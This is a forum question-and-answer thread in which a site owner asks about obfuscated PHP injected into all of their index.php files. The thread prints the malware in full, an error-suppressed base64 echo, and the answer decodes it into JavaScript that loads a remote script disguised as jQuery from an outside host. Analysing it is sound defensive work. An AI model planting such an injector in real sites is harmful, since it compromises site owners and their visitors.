What does this PHP injected-code do?

Question

I've just found out that all of my websites on one of my server has been hacked. Some seemingly malicious code was injected into all index.php files:

/*EngineWork*/
if(!defined("FDSJERIUI234FSDF")){
    @ob_start();
    @define("FDSJERIUI234FSDF",1);
    @ini_set("display_errors",0);
    @error_reporting(0);
    echo base64_decode("PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPi8qQGNjX29uIApmdW5jdGlvbiBnbnd6aigpewogdmFyIGt1bnR3ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7IGt1bnR3LnNyYyA9ICdodHRwOi8vYmxvbmRlc2NyaXB0LmNvbS9kYXRhL2pxdWVyeV8xLjcuNC5taW4uanM/cj0nK3dpbmRvdy5sb2NhdGlvbi5ob3N0bmFtZTsgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2hlYWQnKVswXS5hcHBlbmRDaGlsZChrdW50dyk7Cn07dmFyIGdkbXp2ID0gc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKXtpZihkb2N1bWVudC5ib2R5ICE9IG51bGwgJiYgdHlwZW9mIGRvY3VtZW50LmJvZHkgIT0gJ3VuZGVmaW5lZCcpe2NsZWFySW50ZXJ2YWwoZ2RtenYpO2dud3pqKCk7fX0sMTAwKTtAKi8KPC9zY3JpcHQ+");
}/*EngineWork*/

What does this code do? Is there a known-attack like this which I should read about to prevent it from coming back?

Answer 1

if you run the base64 decode, you get:

<script type='text/javascript'>/*@cc_on 
function gnwzj(){
 var kuntw = document.createElement('script'); kuntw.src = 'http://blondescript.com/data/jquery_1.7.4.min.js?r='+window.location.hostname; document.getElementsByTagName('head')[0].appendChild(kuntw);
};var gdmzv = setInterval(function(){if(document.body != null && typeof document.body != 'undefined'){clearInterval(gdmzv);gnwzj();}},100);@*/
</script>

It injects extra code onto your site.